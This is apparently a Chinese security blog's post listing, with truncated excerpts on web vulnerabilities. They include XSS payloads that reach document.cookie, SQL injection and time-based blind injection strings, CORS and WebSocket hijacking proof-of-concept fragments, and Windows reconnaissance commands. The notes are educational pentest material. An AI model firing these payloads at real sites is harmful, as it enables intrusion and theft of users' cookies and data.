摘要: websocket跨域劫持 poc: <meta charset="utf-8"> <script> function ws_attack(){//自定义函数ws_attack //定义函数功能 //创建WebSocket并赋值给ws变量 var ws = new WebSocket("url"); 阅读全文
posted @ 2020-07-04 22:26 connan 阅读(448) 评论(0) 推荐(0) 编辑
摘要: web常见漏洞: 反射型xss 存储型xss csrf crlf注入 sql注入 逻辑漏洞 任意文件读取 任意文件下载 文件包含 rce 命令执行 任意url跳转 ssrf xxe 信息泄露 cors 点击劫持 ssti(服务器端模板注入) ssi(服务器端包含) rpo(相对路径覆盖) csv注入 阅读全文
posted @ 2020-06-13 22:44 connan 阅读(150) 评论(0) 推荐(0) 编辑
摘要: 跨站资源共享cors 常用payload: <!DOCTYPE html><html><body>div id="demo"><button type="button" onclick="cors()">Exploit</button></div> <script>function cors() { 阅读全文
posted @ 2020-05-05 21:04 connan 阅读(171) 评论(0) 推荐(0) 编辑
摘要: http leak漏洞发生场景: 引用外部资源处,超链接,中间跳转(redirect_url,callback等) 危害:信息泄露,用户劫持 工具:burp collaborator 阅读全文
posted @ 2020-04-17 11:40 connan 阅读(150) 评论(0) 推荐(0) 编辑
摘要: windows: whoami /all 查看当前权限 ipconfig /all 查看网络配置 systeminfo 查看操作系统与版本信息 echo %processor_architecture% 查看系统的体系结构 wmic product get name,version 查看安装的软件及 阅读全文
posted @ 2020-03-08 23:14 connan 阅读(248) 评论(0) 推荐(0) 编辑
摘要: xss payload "><script>alert(1)</script>//<img src=x onerror=alert(2)><svg /onload=alert`1`><embed src=//tiny.cc></textarea><script>alert(document.cook 阅读全文
posted @ 2020-03-01 20:42 connan 阅读(324) 评论(0) 推荐(0) 编辑
摘要: xss 阅读全文
posted @ 2020-02-19 00:43 connan 阅读(233) 评论(0) 推荐(0) 编辑
摘要: 1.注释符 #... -- ... /* ... */ 2.union查询时要使字段数相同 ?id=-1' union select 1,2,3 --+; 3.盲注 1)延时注入 and sleep(4); if(ascii(substr(database(),1,1))>115,0,sleep(4 阅读全文
posted @ 2020-02-05 21:16 connan 阅读(173) 评论(0) 推荐(0) 编辑
摘要: 1.进入数据库 mysql -h 主机地址 -u username -p password; 2.增加新用户 grant select (insert,update,delete,all privileges) on 数据库.* to username@登录主机 identified by '''p 阅读全文
posted @ 2020-01-31 00:43 connan 阅读(141) 评论(0) 推荐(0) 编辑
摘要: 1.安装完kali-2019.4版出现乱码问题 2.更新源,用vi编辑器,在/etc/apt/resources.list中添加清华源 #清华大学 [更新源]deb https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib 阅读全文
posted @ 2020-01-28 00:28 connan 阅读(607) 评论(0) 推荐(0) 编辑